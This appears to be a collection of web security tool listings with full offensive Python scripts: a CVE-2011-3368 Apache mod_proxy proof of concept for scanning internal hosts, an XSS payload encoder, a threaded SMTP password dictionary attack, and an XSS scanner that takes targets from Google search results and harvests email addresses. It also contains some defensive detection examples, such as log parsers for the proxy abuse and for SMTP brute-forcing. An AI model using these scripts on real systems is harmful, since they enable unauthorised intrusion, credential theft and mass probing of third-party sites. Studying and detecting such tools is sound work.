IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the point where users can build their own security scanners on top of it. An advanced user with Python/Ruby scripting expertise can make full use of the platform, but many of the tool's features are simple enough for absolute beginners.
Passive Plug-ins
- Analyze all traffic going through the tool
- Can also modify the traffic
- Identify vulnerabilities passively
E.g. passwords sent in clear text, HttpOnly/Secure flag missing on cookies
Active Plug-ins
- Perform scans against the target to identify vulnerabilities
- Executed only when the user explicitly calls them
- Fine-grained scanning support
E.g. cross-site scripting, SQL injection
IronWASP performs taint analysis for DOM-based XSS: it identifies sources and sinks and traces them through the code. Custom source and sink objects can also be configured.
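The two passive findings named above, as an added example that is not IronWASP code: a small check over one captured request/response pair that reports a credential posted over plain HTTP and Set-Cookie headers lacking HttpOnly or Secure. The function names, the credential parameter list and the sample traffic are this example's own assumptions.

```python
"""Passive checks of the kind IronWASP's passive plug-ins perform.

Added example, not IronWASP code: it inspects one captured request/response
pair and reports a credential sent over plain HTTP and cookies set without
HttpOnly or Secure.  Function names, the parameter list and the sample
traffic are this example's own constructions.
"""
import re
from typing import List, Tuple

CREDENTIAL_PARAMS = ("password", "passwd", "pwd")  # assumed list


def split_message(raw: str) -> Tuple[str, List[Tuple[str, str]], str]:
    """Split a raw HTTP message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def passive_checks(scheme: str, request: str, response: str) -> List[str]:
    """Return human-readable findings for one request/response pair."""
    findings = []
    _, _, req_body = split_message(request)
    if scheme == "http":
        for param in CREDENTIAL_PARAMS:
            if re.search(r"(^|&)%s=" % param, req_body):
                findings.append("credential parameter '%s' sent over clear-text HTTP" % param)
    _, headers, _ = split_message(response)
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie = value.split("=", 1)[0].strip()
        # everything after the first ';' is a flag or a key=value attribute
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append("cookie '%s' set without HttpOnly" % cookie)
        if "secure" not in attrs:
            findings.append("cookie '%s' set without Secure" % cookie)
    return findings


# Constructed sample traffic: a login over plain HTTP, two cookies in reply
SAMPLE_REQUEST = (
    "POST /login HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=alice&password=hunter2")
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=abc123; Path=/\r\n"
    "Set-Cookie: csrftoken=xyz; Path=/; Secure; HttpOnly\r\n\r\n"
    "<html></html>")

if __name__ == "__main__":
    for finding in passive_checks("http", SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print("[passive] " + finding)
```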
SecPoint Netbios Share Scanner
The Netbios Share Samba Scanner scans class C networks and reveals all open shares. It reports the share details, can show the content of the shares, and also lists shares that are not accessible. A username and password can be supplied.
Mole – automatic SQL injection exploitation tool
The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string from the site, it detects the injection and exploits it, using either the UNION technique or a boolean-based technique.
Features:
* Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
* Command line interface. Different commands trigger different actions.
* Auto-completion for commands, command arguments, and database, table and column names.
* Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
* Developed in Python 3.
pythonsqldumper
This is an open source SQL dumper written in Python.
Features:
- Database support: MySQL
- Injection methods: INBAND, BLIND
- Injection in all parameters sent to the server: GET, POST, HEADERS (Cookie, User-Agent, ...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded with the base64 algorithm
- Supports proxies (HTTP, SOCKS4, SOCKS5)
- Supports injection over HTTPS through a proxy (SOCKS only)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only the structure of the database
- Increases the delay between two consecutive failed requests (allows the server to cool down)
- Delay between requests
Bugs and suggestions: tdx_ev@yahoo.com.
Apache mod_proxy proof of concept (CVE-2011-3368)
```python
#!/usr/bin/env python
import socket
import string
import getopt, sys

known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    # request-target of the form <url>@<internal host>:<port>/<resource>
    get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.send(get)
        return remoteserver.recv(4096)
    except:
        return ""

def get_banner(result):
    return result[string.find(result, "\r\n\r\n")+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if string.find(result,"HTTP/1.1 200")!=-1 or \
           string.find(result,"HTTP/1.1 30")!=-1 or \
           string.find(result,"HTTP/1.1 502")!=-1:
            print "- Open port: " + port + "/TCP"
            print get_banner(result)
        elif len(result)==0:
            print "- Filtered port: " + port + "/TCP"
        else:
            print "- Closed port: " + port + "/TCP"

def usage():
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print "usage():"
    print "python apache_scan.py [options]"
    print
    print " [options]"
    print " -r: Remote Apache host"
    print " -p: Remote Apache port (default is 80)"
    print " -u: URL on the remote web server (default is /)"
    print " -d: Host in the DMZ (default is 127.0.0.1)"
    print " -e: Port in the DMZ (enables 'single port scan')"
    print " -g: GET request to the host in the DMZ (default is /)"
    print " -h: Help page"
    print
    print "examples:"
    print " - Port scan of the remote host"
    print " python apache_scan.py -r www.example.com -u /images/test.gif"
    print " - Port scan of a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
    print " - Retrieve a resource from a host in the DMZ"
    print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
    print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print " [+] Target: " + apache_target
    print " [+] Target port: " + apache_port
    print " [+] Internal host: " + internal_target
    print " [+] Tested ports: " + str(tested_ports)
    print " [+] Internal resource: " + resource
    print

def main():
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit(2)
            if o == "-u":
                url=a
            if o == "-r":
                apache_target=a
            if o == "-p":
                apache_port=a
            if o == "-d":
                internal_target = a
            if o == "-e":
                internal_port=a
            if o == "-g":
                resource=a
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    if apache_target == "":
        usage()
        sys.exit(2)

# module-level defaults; main() overrides them from the command line
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
if internal_port!="":
    tested_ports = [internal_port]
else:
    tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
```
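From the defender's side, the request shape the PoC emits (a request-target carrying `@host:port` before the resource) is exactly what an Apache access log records for an attempt against this flaw. The following is an added example, not part of the PoC, that flags such entries in Common Log Format lines constructed here; the upstream mitigation was to make RewriteRule/ProxyPassMatch patterns begin with a leading `/`.

```python
"""Detect CVE-2011-3368-style request lines in Apache access logs.

Added example (not part of the PoC above): the PoC builds request-targets of
the form '<path>@<internal-host>:<port>/<resource>'.  A legitimate path never
carries an '@' authority component before the query string, so such entries
are worth alerting on.  The log lines are constructed for this example.
"""
import re
from typing import List, Optional

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')
# '<path>@host[:port]/' with no '?' before the '@', so query values such as
# ?email=alice@example.com are not flagged
ABUSE_RE = re.compile(
    r'^[^?\s]*@(?P<host>[A-Za-z0-9.\-]+)(?::(?P<port>\d{1,5}))?(?:/|$)')

# Constructed sample: one normal hit, two probe attempts, one e-mail parameter
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Oct/2011:10:00:01 +0000] "GET /images/test.gif HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Oct/2011:10:00:02 +0000] '
    '"GET /images/test.gif@internalhost.local:80/accounts/index.html HTTP/1.1" 200 2048',
    '203.0.113.5 - - [12/Oct/2011:10:00:03 +0000] "GET /images/test.gif@127.0.0.1:22/ HTTP/1.1" 502 341',
    '198.51.100.7 - - [12/Oct/2011:10:00:04 +0000] "GET /contact?email=alice@example.com HTTP/1.1" 200 900',
]


def suspicious_target(request_line: str) -> Optional[str]:
    """Return 'host:port' when the request-target smuggles an internal
    authority into the path, else None."""
    parts = request_line.split(" ")
    if len(parts) != 3:  # method, target, version
        return None
    m = ABUSE_RE.match(parts[1])
    if not m:
        return None
    return "%s:%s" % (m.group("host"), m.group("port") or "80")


def scan_log(lines: List[str]) -> List[dict]:
    """Parse CLF lines and collect probe attempts with their source IP and
    the status the proxy returned (the PoC reads 200/30x/502 as 'open')."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = suspicious_target(m.group("req"))
        if target:
            hits.append({"src": m.group("src"), "internal": target,
                         "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%(src)s probed %(internal)s via the proxy (HTTP %(status)d)" % hit)
```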
Python XSS payload encoder
```python
#!/usr/bin/env python
'''
Python XSS payload encoder
Author: BGS (rstcenter.com)
Contributor cmiN (rstcenter.com)
Date: 13 August 2011
Version: Python 2.7
'''
import time
import sys
import urllib2
import base64

def main():
    try:
        if sys.argv[1] == "help":
            print '[-]'+time.ctime()
            print'''[-]Instructions:
encoder.py
Available encodings: ascii b64 hex url
[-]Exiting...
'''
        elif sys.argv[1] == "b64":
            b64_encode()
        elif sys.argv[1] == "ascii":
            ascii_encode()
        elif sys.argv[1] == "hex":
            hex_encode()
        elif sys.argv[1] == "url":
            url_encode()
        else:
            sys.exit(1)
    except Exception, e:
        print 'Type "encoder.py help" for instructions! '
        sys.exit(1)

def b64_encode():
    payload = sys.argv[2]
    encoded = base64.standard_b64encode(payload)
    print ' ################## B64 String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"

def ascii_encode():
    payload = sys.argv[2]
    string = ''
    for w in payload:
        string += str(ord(w)) + ","
    print ' ################## ASCII String #####################'
    print ''
    print 'string.fromCharCode(' + string.strip(",") +')'
    print ''
    print "#################### >>EOF<< #########################"

def hex_encode():
    payload = sys.argv[2]
    encoded = payload.encode('hex')
    print ' ################## HEX String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"

def url_encode():
    payload = sys.argv[2]
    encoded = urllib2.quote(payload.encode("utf8"))
    print ' ################## URL String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"

if __name__ == '__main__':
    main()
```
SMTP dictionary attack in Python
```python
#! /usr/bin/env python3.2
# SMTP Dictionary Attack
# 21.03.2011 cmiN
from smtplib import SMTP
from sys import argv
import threading

def usage():
    print("\tUsage: source.ext")
    print("Note that hosts, users and words are text files with")
    print("Threads is an integer.")
    print("Timeout is a float in seconds and is optional.")
    print("Example: smda.py hosts.txt C:\\users.txt /tmp/words.txt 10 1")

def fill_vec(name, vec):
    # read one entry per line into the set, returning how many were new
    count = 0
    with open(name, "rt") as fin:
        for x in fin:
            y = x.strip()
            if not y in vec:
                vec.add(y)
                count += 1
    return count

class SDA(threading.Thread):
    hvec = None
    timeout = None
    count = 0
    fobj = None

    def __init__(self, user, word):
        threading.Thread.__init__(self)
        self.user = user
        self.word = word

    def run(self):
        for host in list(SDA.hvec):
            try:
                server = SMTP(host, timeout=SDA.timeout)
                server.login(self.user, self.word)
                server.quit()
                if host in SDA.hvec:
                    SDA.hvec.remove(host)
                string = "%s %s %s\n" % (host, self.user, self.word)
                SDA.fobj.write(string)
                SDA.fobj.flush()
                SDA.count += 1
            except:
                pass

def process(hosts, users, words, threads, timeout=None):
    hvec, uvec, wvec = set(), set(), set()
    comp = fill_vec(hosts, hvec) * ((fill_vec(users, uvec) * fill_vec(words, wvec)) / threads)
    print("Processing %d requests per thread. Please wait..." % comp)
    SDA.hvec = hvec
    SDA.timeout = timeout
    SDA.fobj = open("working.txt", "at")
    for user in uvec:
        for word in wvec:
            while threading.active_count() > threads:
                pass
            SDA(user, word).start()
    while threading.active_count() > 1:
        pass
    SDA.fobj.write("=" * 50 + "\n")
    SDA.fobj.close()
    print("Finished! Were found %d working SMTPs (see 'working.txt')." % SDA.count)

def main():
    if len(argv) == 6:
        process(argv[1], argv[2], argv[3], int(argv[4]), float(argv[5]))
    elif len(argv) == 5:
        process(argv[1], argv[2], argv[3], int(argv[4]))
    else:
        usage()

if __name__ == "__main__":
    main()
```
by cmiN@rrstcenter
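On the receiving mail server, a sweep like the one the script above performs shows up as a burst of failed SASL logins from one client. As an added example (not part of the script), the detection below counts Postfix-style "SASL ... authentication failed" warnings per client within a sliding window; the log lines, threshold and window are this example's own constructions.

```python
"""Flag SMTP AUTH dictionary attacks in Postfix-style smtpd logs.

Added example, not part of the script above.  The attack tries every
user/password pair against every listed host, so the receiving server sees a
burst of 'SASL ... authentication failed' warnings from one client.  The log
lines are constructed; the threshold and window are this example's choice.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"warning: \S+\[(?P<ip>[\d.]+)\]: SASL \w+ authentication failed")


def parse_ts(stamp: str, year: int = 2011) -> datetime:
    """Syslog stamps carry no year; supply one so they can be compared."""
    return datetime.strptime("%d %s" % (year, stamp), "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines: List[str], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, int]:
    """Return {client_ip: total_failures} for clients with at least
    `threshold` failures inside any `window`-long sliding interval."""
    events = defaultdict(list)
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            events[m.group("ip")].append(parse_ts(m.group("ts")))
    flagged = {}
    for ip, stamps in events.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


# Constructed sample: six failures in 11 s from one client, two slow
# failures from another, plus an unrelated connect line
SAMPLE_LOG = [
    "Mar 21 10:00:%02d mx postfix/smtpd[4321]: warning: unknown[203.0.113.5]: "
    "SASL LOGIN authentication failed: authentication failure" % s
    for s in (1, 3, 4, 6, 9, 12)
] + [
    "Mar 21 10:00:05 mx postfix/smtpd[4322]: warning: unknown[198.51.100.7]: "
    "SASL PLAIN authentication failed: authentication failure",
    "Mar 21 10:09:40 mx postfix/smtpd[4330]: warning: unknown[198.51.100.7]: "
    "SASL PLAIN authentication failed: authentication failure",
    "Mar 21 10:00:07 mx postfix/smtpd[4323]: connect from unknown[198.51.100.7]",
]

if __name__ == "__main__":
    for ip, n in detect_bruteforce(SAMPLE_LOG).items():
        print("%s: %d SASL failures, likely dictionary attack" % (ip, n))
```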
Python XSS scanner
```python
#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket

def title():
    print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3"
    print "\t-----------------------------------------------"

def usage():
    title()
    print "\n Usage: python XSSscan.py"

def StripTags(text):
    # remove every <...> tag so the host regex runs over visible text only
    finished = 0
    while not finished:
        finished = 1
        start = text.find("<")
        if start >= 0:
            stop = text[start:].find(">")
            if stop >= 0:
                text = text[:start] + text[start+stop+1:]
                finished = 0
    return text

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

def geturls(query):
    counter = 10
    urls = []
    while counter < int(sys.argv[3]):
        url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
        opener = urllib2.build_opener(url)
        opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
        data = opener.open(url).read()
        hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
        #Lets add sites found to a list if not already or a google site.
        #We don't want to upset the people that got our list for us.
        for x in hosts:
            if x.find('www') != -1:
                x = x[x.find('www'):]
            if x not in urls and re.search("google", x) == None:
                urls.append(x)
        counter += 10
    return urls

def getemails(site):
    try:
        if site.split("/",1)[0] not in done:
            print "\t[+] Collecting Emails:",site.split("/",1)[0]
            webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()
            emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
            done.append(site.split("/",1)[0])
            if emails:
                return emails
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)
    except(IndexError):
        pass

def getvar(site):
    names = []
    actions = []
    print "\n","-"*45
    print "[+] Searching:",site
    try:
        webpage = urllib2.urlopen(proto+"://"+site, port).read()
        emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
        var = re.findall("\?[\w\.\-/]*\=",webpage)
        if len(var) >=1:
            var = list(sets.Set(var))
        found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
        found_action = list(sets.Set(found_action))
        if len(found_action) >= 1:
            for a in found_action:
                a = a.split('"',2)[1]
                try:
                    if a[0] != "/":
                        a = "/"+a
                except(IndexError):
                    pass
                actions.append(a)
        found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
        found_names = list(sets.Set(found_names))
        for n in found_names:
            names.append(n.split('"',2)[1])
        print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
        print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads)
        if len(var) >= 1:
            for v in var:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        for xss in xss_payloads:
                            tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
                for xss in xss_payloads:
                    tester(site+"/"+v+xss)
        if len(names) >= 1:
            for n in names:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        for xss in xss_payloads:
                            tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
                for xss in xss_payloads:
                    tester(site+"/"+"?"+n+"="+xss)
        if len(actions) != 0 and len(names) >= 1:
            for a in actions:
                for n in names:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            for xss in xss_payloads:
                                tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
                    #tester(site.split("/")[0]+a+"?"+n+"="+xss)
        if len(actions) != 0 and len(var) >= 1:
            for a in actions:
                for v in var:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            for xss in xss_payloads:
                                tester(site.rsplit('/',x+1)[0]+a+v+xss)
                    else:
                        for xss in xss_payloads:
                            tester(site.split("/")[0]+a+v+xss)
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
    except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
        pass
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)

def tester(target):
    if verbose ==1:
        if message != "":
            print "Target:",target.replace(alert ,message)
        else:
            print "Target:",target
    try:
        source = urllib2.urlopen(proto+"://"+target, port).read()
        h = httplib.HTTPConnection(target.split('/')[0], int(port))
        try:
            h.request("GET", "/"+target.split('/',1)[1])
        except(IndexError):
            h.request("GET", "/")
        r1 = h.getresponse()
        if verbose ==1:
            print "\t[+] Response:",r1.status, r1.reason
        if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
            if target not in found_xss:
                if message != "":
                    print "\n[!] XSS:", target.replace(alert ,message)
                else:
                    print "\n[!] XSS:", target
                print "\t[+] Response:",r1.status, r1.reason
                emails = getemails(target)
                if emails:
                    print "\t[+] Email:",len(emails),"addresses\n"
                    found_xss.setdefault(target, list(sets.Set(emails)))
                else:
                    found_xss[target] = "None"
    except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
        pass
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)
    except():
        pass

if len(sys.argv) <= 2:
    usage()
    sys.exit(1)

for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    if arg.lower() == "-w" or arg.lower() == "-write":
        txt = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-a" or arg.lower() == "-alert":
        message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])

title()
socket.setdefaulttimeout(3)
found_xss = {}
done = []
count = 0
proto = "http"
alert = "D3HYDR8%2D0wNz%2DY0U"
print "\n[+] XSS_scan Loaded"
try:
    if verbose ==1:
        print "[+] Verbose Mode On"
except(NameError):
    verbose = 0
    print "[-] Verbose Mode Off"
try:
    if message:
        print "[+] Alert:",message
except(NameError):
    print "[+] Alert:",alert
    message = ""
    pass
xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
                "%22%3E",
                "%22%3E",
                "'';!--\"<%27"+alert+"%27>=&{()}",
                "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
                ""]
try:
    if txt:
        print "[+] File:",txt
except(NameError):
    txt = None
    pass
print "[+] XSS Payloads:",len(xss_payloads)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
    try:
        if sys.argv[3].isdigit() == False:
            print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
            sys.exit(1)
        else:
            if int(sys.argv[3]) <= 10:
                print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
                sys.exit(1)
    except(IndexError):
        print "\n[-] Need number of hosts to collect.\n"
        sys.exit(1)
    query = re.sub("\s","+",sys.argv[2])
    port = "80"
    print "[+] Query:",query
    print "[+] Querying Google..."
    urls = geturls(query)
    print "[+] Collected:",len(urls),"hosts"
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(3)
    while len(urls) > 0:
        print "-"*45
        print "\n[-] Length:",len(urls),"remain"
        getvar(random.choice(urls))
if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
    site = sys.argv[2]
    try:
        if sys.argv[3].isdigit() == False:
            port = "80"
        else:
            port = sys.argv[3]
    except(IndexError):
        port = "80"
    print "[+] Site:",site
    print "[+] Port:",port
    if site[:7] == "http://":
        site = site.replace("http://","")
    if site[:8] == "https://":
        proto = "https"
        if port == "80":
            print "[!] Using port 80 with https? (443)"
        site = site.replace("https://","")
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(4)
    getvar(site)
print "-"*65
print "\n\n[+] Potential XSS found:",len(found_xss),"\n"
time.sleep(3)
if txt != None and len(found_xss) >=1:
    xss_file = open(txt, "a")
    xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n")
    xss_file.writelines("\t------------------------------------------\n\n")
    print "[+] Writing Data:",txt
else:
    print "[-] No data written to disk"
for k in found_xss.keys():
    count+=1
    if txt != None:
        if message != "":
            xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n")
        else:
            xss_file.writelines("["+str(count)+"] "+k+"\n")
    if message != "":
        print "\n["+str(count)+"]",k.replace(alert ,message)
    else:
        print "\n["+str(count)+"]",k
    addrs = found_xss[k]
    if addrs != "None":
        print "\t[+] Email addresses:"
        for addr in addrs:
            if txt != None:
                xss_file.writelines("\tEmail: "+addr+"\n")
            print "\t -",addr
print "\n[-] Done -",timer(),"\n"
```
